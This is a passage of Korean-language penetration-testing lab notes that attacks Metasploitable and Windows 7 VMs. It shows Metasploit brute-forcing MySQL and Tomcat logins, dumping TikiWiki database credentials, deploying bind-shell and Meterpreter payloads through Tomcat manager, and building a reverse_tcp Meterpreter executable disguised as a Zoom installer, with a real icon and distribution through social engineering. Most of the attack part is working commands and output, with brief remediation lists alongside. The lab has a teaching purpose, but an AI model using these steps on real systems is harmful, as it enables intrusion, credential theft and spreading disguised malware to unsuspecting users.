[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: admin:1234 (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: admin:0000 (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: administrator:toor1234. (Incorrect: Access denied for user 'administrator'@'192.168.20.50' (using password: YES))
[+] 192.168.20.204:3306 - 192.168.20.204:3306 - Success: 'root:'
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: msfadmin:msfadmin (Incorrect: Access denied for user 'msfadmin'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: user1:user1 (Incorrect: Access denied for user 'user1'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: user2:user2 (Incorrect: Access denied for user 'user2'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: user01:user01 (Incorrect: Access denied for user 'user01'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: user01:toor1234. (Incorrect: Access denied for user 'user01'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: user02:user02 (Incorrect: Access denied for user 'user02'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: tomcat:tomcat (Incorrect: Access denied for user 'tomcat'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: postgres:postgres (Incorrect: Access denied for user 'postgres'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: mysql:mysql (Incorrect: Access denied for user 'mysql'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: cisco:cisco (Incorrect: Access denied for user 'cisco'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: test:test (Incorrect: Access denied for user 'test'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: tester:tester (Incorrect: Access denied for user 'tester'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: ftpuser:ftpuser (Incorrect: Access denied for user 'ftpuser'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: ftpusers:ftpusers (Incorrect: Access denied for user 'ftpusers'@'192.168.20.50' (using password: YES))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mysql/mysql_login) > back
msf >
3) MySQL 원격 로그인 시도
- Kail에서 다른 터미널창을 이용하여 Meta(192.168.20.204)로 Mysql 원격 로그인을 실시한다.
root@kali:~# mysql -h 192.168.20.204 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 74
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
MySQL [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [mysql]> show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------+
17 rows in set (0.00 sec)
MySQL [mysql]> desc user;
+-----------------------+-----------------------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------------+-----------------------------------+------+-----+---------+-------+
| Host | char(60) | NO | PRI | | |
| User | char(16) | NO | PRI | | |
| Password | char(41) | NO | | | |
~ 중간 생략 ~
MySQL [mysql]> select host,user,password from user;
+------+------------------+----------+
| host | user | password |
+------+------------------+----------+
| | debian-sys-maint | |
| % | root | |
| % | guest | |
+------+------------------+----------+
3 rows in set (0.00 sec)
MySQL [mysql]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
MySQL [tikiwiki]> use tikiwiki195;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [tikiwiki195]> show tables;
~ 중간 생략 ~
| users_permissions |
| users_usergroups |
| users_users |
+------------------------------------+
194 rows in set (0.00 sec)
MySQL [tikiwiki195]> desc users_users;
+------------------+--------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------------+--------------+------+-----+---------+----------------+
| userId | int(8) | NO | PRI | NULL | auto_increment |
| email | varchar(200) | YES | | NULL | |
| login | varchar(40) | NO | | | |
| password | varchar(30) | YES | | | |
MySQL [tikiwiki195]> select userid,email,login,password from users_users;
+--------+-------+-------+----------+
| userid | email | login | password |
+--------+-------+-------+----------+
| 1 | | admin | admin |
+--------+-------+-------+----------+
1 row in set (0.00 sec)
MySQL [tikiwiki195]> exit
Bye
root@kali:~#
4) 취약점 해결 방안
- Mysql 관리자 패스워드 설정
- 패스워드 복잡성 권장
- Mysql 원격 로그인 비활성화
[참고] 패스워드 복잡성 확인 사이트
- https://www.security.org/how-secure-is-my-password
8. 'tikiwiki 1.9.5' 취약점을 이용한 MySQL ID/PASSWORD 크래킹
- 공동 집단이 사용 및 작업(게시물 수정 가능)할 수 있는 게시판 서비스
- Ex) 나무위키, 제타위키, 티키위키
1) tikiwiki195 데이터베이스 활성화
root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php &
TikiWiki is not properly set up:
Unable to connect to the database !
Go here to begin the installation process, if you haven't done so already.
----------------------------------------------- 클릭
Access denied for user 'root'@'localhost' (using password: YES)
Database type: MySQL
Host: localhost
User: root
Password:
Database name: tikiwiki195
[질의 보내기] <- 클릭
Install
Create [Default Installation profile]
database [create] <- 클릭
(clean
install)
with
profile:
2) 'tikidblib'을 이용한 Mysql 관리자 아이디/패스워드 크랙킹
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/admin/tikiwiki
tikidblib.rb
- tikiwiki 웹 페이지 소스코드 취약점을 이용하여 tikiwiki 웹 서비스와 연동된 MySQL의 ID/PASSWORD를 검색하는 공격이다.
msf > search tikiwiki
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/tikiwiki/tikidblib 2006-11-01 normal TikiWiki Information Disclosure
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
exploit/unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent TikiWiki tiki-graph_formula Remote PHP Code Execution
exploit/unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent TikiWiki jhot Remote Command Execution
exploit/unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent Tiki Wiki unserialize() PHP Code Execution
exploit/unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Tiki Wiki Unauthenticated File Upload Vulnerability
msf > use auxiliary/admin/tikiwiki/tikidblib
msf auxiliary(admin/tikiwiki/tikidblib) > show options
Module options (auxiliary/admin/tikiwiki/tikidblib):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /tikiwiki yes TikiWiki directory path
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Download
msf auxiliary(admin/tikiwiki/tikidblib) > set rhost 192.168.20.204
rhost => 192.168.20.204
msf auxiliary(admin/tikiwiki/tikidblib) > exploit
[*] Establishing a connection to the target...
[*] Get informations about database...
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type : mysql
[*] DB name : tikiwiki195
[*] DB host : localhost
[*] DB user : root
[*] DB password :
[*] Auxiliary module execution completed
msf auxiliary(admin/tikiwiki/tikidblib) >
3) MySQL 원격 로그인 시도
- Kail에서 다른 터미널창을 이용하여 Meta(192.168.20.204)로 Mysql 원격 로그인을 실시한다.
root@kali:~# mysql -h 192.168.20.204 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 74
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
MySQL [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [mysql]> show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------+
17 rows in set (0.00 sec)
MySQL [mysql]> desc user;
+-----------------------+-----------------------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------------+-----------------------------------+------+-----+---------+-------+
| Host | char(60) | NO | PRI | | |
| User | char(16) | NO | PRI | | |
| Password | char(41) | NO | | | |
~ 중간 생략 ~
MySQL [mysql]> select host,user,password from user;
+------+------------------+----------+
| host | user | password |
+------+------------------+----------+
| | debian-sys-maint | |
| % | root | |
| % | guest | |
+------+------------------+----------+
3 rows in set (0.00 sec)
MySQL [mysql]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
MySQL [tikiwiki]> use tikiwiki195;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [tikiwiki195]> show tables;
~ 중간 생략 ~
| users_permissions |
| users_usergroups |
| users_users |
+------------------------------------+
194 rows in set (0.00 sec)
MySQL [tikiwiki195]> desc users_users;
+------------------+--------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------------+--------------+------+-----+---------+----------------+
| userId | int(8) | NO | PRI | NULL | auto_increment |
| email | varchar(200) | YES | | NULL | |
| login | varchar(40) | NO | | | |
| password | varchar(30) | YES | | | |
MySQL [tikiwiki195]> select userid,email,login,password from users_users;
+--------+-------+-------+----------+
| userid | email | login | password |
+--------+-------+-------+----------+
| 1 | | admin | admin |
+--------+-------+-------+----------+
1 row in set (0.00 sec)
4) tikiwiki 관리자 페이지 로그인 시도(admin/admin)
root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php
5) 취약점 해결
- Tikiwiki 1.9.5 버전 업그레이드 및 패치
- Mysql 관리자 패스워드 설정
- 패스워드 복잡성 권장
- Mysql 원격 로그인 비활성화
- Mysql 및 웹-페이지 관리자 패스워드를 평문이 아닌 해시 값으로 저장
[참고] TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure
- 참고 사이트 : https://www.exploit-db.com/exploits/2701
- Kali 터미널 창 -> firefox & -> 주소창 -> http://192.168.20.204/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
- Kali 터미널 창 -> firefox & -> 주소창 -> http://192.168.20.204/tikiwiki/tiki-lastchanges.php?days=1&offset=0&sort_mode=
9. 'Tomcat' 관리자 ID/PW 크래킹
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/http | grep tomcat
tomcat_enum.rb
tomcat_mgr_login.rb
- Tomcat : Apache 웹-서버가 수신한 JSP 요청을 처리하는 웹 서비스 관련 미들 웨어
- Tomcat 서비스가 활성화된 웹 서버로 사전 대입 공격을 실시하여 Tomcat 관리자 ID/PASSWORD을 검색하는 공격이다.
- 공격자가 ID/PASSWORD을 알게되면, Tomcat 관리자로 로그인하여 악성코드 업로드, 데이터 조작, 유출되는 문제가 발생된다.
1) Meta(192.168.20.204) Apache, Tomcat 스캔 정보 확인
msf > services 192.168.20.204
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.20.204 21 tcp ftp open 220 (vsFTPd 2.3.4)\x0d\x0a
192.168.20.204 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.20.204 23 tcp telnet open Linux telnetd
192.168.20.204 25 tcp smtp open Postfix smtpd
192.168.20.204 53 tcp domain open ISC BIND 9.4.2
192.168.20.204 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.20.204 111 tcp rpcbind open 2 RPC #100000
~ 중간 생략 ~
192.168.20.204 8009 tcp ajp13 open Apache Jserv Protocol v1.3
192.168.20.204 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.20.204 8787 tcp drb open Ruby DRb RMI Ruby 1.8; path /usr/lib/ruby/1.8/drb
2) 'tomcat_mgr_login'를 이용한 사전 대입 공격
msf > search tomcat_mgr_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.20.204
rhosts => 192.168.20.204
msf auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180
msf auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
stop_on_success => true
msf auxiliary(scanner/http/tomcat_mgr_login) > set threads 16
threads => 16
msf auxiliary(scanner/http/tomcat_mgr_login) > exploit
[-] 192.168.20.204:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.20.204:8180 - LOGIN FAILED: admin:manager (Incorrect)
~ 중간 생략 ~
[-] 192.168.20.204:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.20.204:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.20.204:8180 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/tomcat_mgr_login) >
3) tomcat 관리자 페이지 로그인 실시(tomcat/tomcat)
root@kali:~# firefox http://192.168.20.204:8180/manager/html &
4) 'tomcat_mgr_deploy'를 이용한 악성 페이로드(java/shell/bind_tcp) 업로드
root@kali:~# ls /usr/share/metasploit-framework/modules/exploits/multi/http | grep tomcat
tomcat_jsp_upload_bypass.rb
tomcat_mgr_deploy.rb
tomcat_mgr_upload.rb
msf auxiliary(scanner/http/tomcat_mgr_login) > search tomcat_mgr_deploy
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
msf auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(multi/http/tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(multi/http/tomcat_mgr_deploy) > set httppassword tomcat
httppassword => tomcat
msf exploit(multi/http/tomcat_mgr_deploy) > set httpusername tomcat
httpusername => tomcat
msf exploit(multi/http/tomcat_mgr_deploy) > set rhost 192.168.20.204
rhost => 192.168.20.204
msf exploit(multi/http/tomcat_mgr_deploy) > set rport 8180
msf exploit(multi/http/tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf exploit(multi/http/tomcat_mgr_deploy) > set payload java/shell/bind_tcp
payload => java/shell/bind_tcp
msf exploit(multi/http/tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword tomcat no The password for the specified username
HttpUsername tomcat no The username to authenticate as
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.20.204 yes The target address
RPORT 8180 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (java/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.20.204 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(multi/http/tomcat_mgr_deploy) > exploit // 세션 연결이 실패되면, 다시 'exploit'을 진행한다.
[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6243 bytes as 6Yyvw8QjFVL.war ...
[*] Executing /6Yyvw8QjFVL/BZbjHiLu85HKuAU9RmK4cQ4.jsp...
[*] Undeploying 6Yyvw8QjFVL ...
[*] Exploit completed, but no session was created.
msf exploit(multi/http/tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Sending stage (2952 bytes) to 192.168.20.204
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6256 bytes as ZQrDThFsLG2ymE6tarF85gw3.war ...
[*] Executing /ZQrDThFsLG2ymE6tarF85gw3/RlNeouBL9.jsp...
[*] Undeploying ZQrDThFsLG2ymE6tarF85gw3 ...
[*] Command shell session 1 opened (192.168.20.50:35965 -> 192.168.20.204:4444) at 2022-05-21 17:31:43 +0900
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
whoami
tomcat55
pwd
/
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat55@metasploitable:/$
tomcat55@metasploitable:/$ ^C
Abort session 1? [y/N] y
[*] 192.168.20.204 - Command shell session 1 closed. Reason: User exit
msf exploit(multi/http/tomcat_mgr_deploy) >
5) 'tomcat_mgr_deploy'를 이용한 악성 페이로드(java/meterpreter/bind_tcp) 업로드
msf exploit(multi/http/tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf exploit(multi/http/tomcat_mgr_deploy) > set payload java/meterpreter/bind_tcp
payload => java/meterpreter/bind_tcp
msf exploit(multi/http/tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword tomcat no The password for the specified username
HttpUsername tomcat no The username to authenticate as
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.20.204 yes The target address
RPORT 8180 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (java/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.20.204 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(multi/http/tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Sending stage (53837 bytes) to 192.168.20.204
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6259 bytes as bU103ap6GvSDwfsJMN1lnLk53HXoI.war ...
[*] Meterpreter session 2 opened (192.168.20.50:36139 -> 192.168.20.204:4444) at 2022-05-21 17:38:12 +0900
[*] Executing /bU103ap6GvSDwfsJMN1lnLk53HXoI/qiBx7hN0Zx.jsp...
[*] Undeploying bU103ap6GvSDwfsJMN1lnLk53HXoI ...
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter >
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
whoami
tomcat55
pwd
/
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat55@metasploitable:/$
tomcat55@metasploitable:/$ ^C
Terminate channel 1? [y/N] y
meterpreter >
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.204 - Meterpreter session 2 closed. Reason: User exit
msf exploit(multi/http/tomcat_mgr_deploy) >
Ex) Reverse TCP Payload을 이용하여 exploit을 시도해본다.
LHOST 192.168.20.50
LPORT 4444
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
[참고] meterpreter
- 메타스플로잇 안에서 다양한 기능을 제공하는 모의 해킹 도구
- Ex) 시스템 정보 확인, 권한 상승, 키보드 스니핑, 모니터 스크린샷, 웹캠 영상 및 스크린샷, SMS 문자 탈취, GPS 위치 정보 확인
[참고] Host 시스템과 VMware 시스템 공유 폴더 구성
- Host 시스템(Windows10)에서 개인 폴더 안에 'vmshare' 이름으로 공유 폴더를 생성한다.
- VMware(Kali, Windows7, Windows2008) 마우스 우클릭 -> Settings -> Options -> Shared Folders
v체크 Always enabled
- Folders -> Add -> Next -> [설정] -> Finish -> OK
[설정]
Host Path D:\개인 폴더\vmshare
Name vmshare
- Kali는 바탕화면에 있는 'mount-shared-folders.sh' 아이콘을 실행한다.
- 터미널 창에서 'ls /mnt/hgfs'를 실시하여 'vmshare' 디렉토리를 확인한다.
- Windows7, Windows2008에서 컴퓨터 -> 좌측 네트워크 -> vmware-host -> Shared Folders -> 'vmshare' 폴더를 확인한다.
- 강사 PC 공유 폴더 -> \\192.168.10.27 -> 98_도구 -> '04_Resource Hacker' 폴더를 D:\개인 폴더\vmshare에 복사한다.
10. 'Reverse_TCP' 페이로드 제작 및 유포
1) Kali에서 'msfvenom' 명령어를 이용한 'Reverse_TCP' 페이로드 제작
- 'msfvenom'을 이용하여 'Reverse_TCP'를 실행하는 악성 페이로드를 제작한다.
root@kali:~# ls /usr/share/metasploit-framework
Gemfile db msfd plugins tools
Gemfile.lock documentation msfdb ruby vendor
Rakefile lib msfrpc script-exploit
app metasploit-framework.gemspec msfrpcd script-password
config modules msfupdate script-recon
data msfconsole msfvenom scripts
root@kali:~# mkdir payloads && cd payloads
root@kali:~/payloads# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.50 lport=4444 -f exe -o ZoomInstallerFull.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: ZoomInstallerFull.exe
2) VMware 공유 폴더(vmshare)를 이용하여 'Reverse_TCP' 페이로드 유포
- 제작된 악성 페이로드는 사회공학적 기법을 이용하여 사용자가 다운로드하여 실행할 수 있게 유포해야 한다.
- 실습 환경에서는 사회공학적 기법을 적용하기 어렵기 때문에 공유를 통하여 악성 페이로드를 유포하도록 한다.
① 제작된 'ZoomInstallerFull.exe' 파일을 Host 시스템 공유 폴더로 복사한다.
root@kali:~/payloads# cp ZoomInstallerFull.exe /mnt/hgfs/vmshare
root@kali:~/payloads# ls /mnt/hgfs/vmshare
ZoomInstallerFull.exe
root@kali:~/payloads# cd
② 실제 PC(Windows10)에서 'ResourceHacker'를 이용하여 'ZoomInstallerFull.exe' 파일에 실제 아이콘을 적용한다.
③ Windows7, Windows2008에서 'vmshare' 폴더에 있는 'ZoomInstallerFull.exe' 파일을 바탕화면에 복사한다.
[참고] 바이러스 토탈
- https://www.virustotal.com/gui/home/upload
- 바이러스 토탈 사이트에 가서 'ZoomInstallerFull.exe' 파일을 업로드하여 내용을 확인한다.
11. 'Reverse_TCP' 대기 상태 스크립트 파일 제작
- Kali에서 'Reverse_TCP' 페이로드를 실행하여 연결될 수 있도록 대기 상태로 설정하는 'reverse.rc' 스크립트 파일을 제작한다.
root@kali:~# cat << EOF > reverse.rc
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.20.50
set lport 4444
set exitsession false
exploit -j -z
EOF
root@kali:~# ls -l reverse.rc
-rw-r--r-- 1 root root 149 5월 22 12:40 reverse.rc
12. 'reverse.rc' 스크립트 및 'Reverse_TCP' 악성 페이로드 실행
1) Kali에서 msfconsole을 이용하여 'reverse.rc' 스크립트 실행
root@kali:~# msfconsole -q -r reverse.rc
[*] Processing reverse.rc for ERB directives.
resource (reverse.rc)> use exploit/multi/handler
resource (reverse.rc)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (reverse.rc)> set lhost 192.168.20.50
lhost => 192.168.20.50
resource (reverse.rc)> set lport 4444
lport => 4444
resource (reverse.rc)> set exitsession false
exitsession => false
resource (reverse.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.20.50:4444
- Kali 다른 터미널 창에서 TCP 4444 대기 상태를 확인한다.
root@kali:~# netstat -nltp | grep 4444
tcp 0 0 192.168.20.50:4444 0.0.0.0:* LISTEN 2029/ruby
2) 타겟 시스템(Windows7)에서 Reverse_TCP 동작을 실시하는 'ZoomInstallerFull.exe' 파일을 실행한다.
3) Kali에서 Meterpreter session이 연결되었는지 확인한다.
[*] Sending stage (205891 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49324) at 2022-05-22 12:48:46 +0900
msf exploit(multi/handler) >
- Kali 다른 터미널 창에서 TCP 4444 연결 상태를 확인한다.
root@kali:~# netstat -ntp | grep 4444
tcp 0 0 192.168.20.50:4444 192.168.20.202:49324 ESTABLISHED 2029/ruby
13. 'Meterpreter' 기능
msf exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows MSDN-SPECIAL\Administrator @ MSDN-SPECIAL 192.168.20.50:4444 -> 192.168.20.202:49324 (192.168.20.202)
1) 'meterpreter'를 이용한 타겟 시스템(Windows7) 제어
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
2) 타겟 시스템(Windows7) 정보 확인
meterpreter > sysinfo
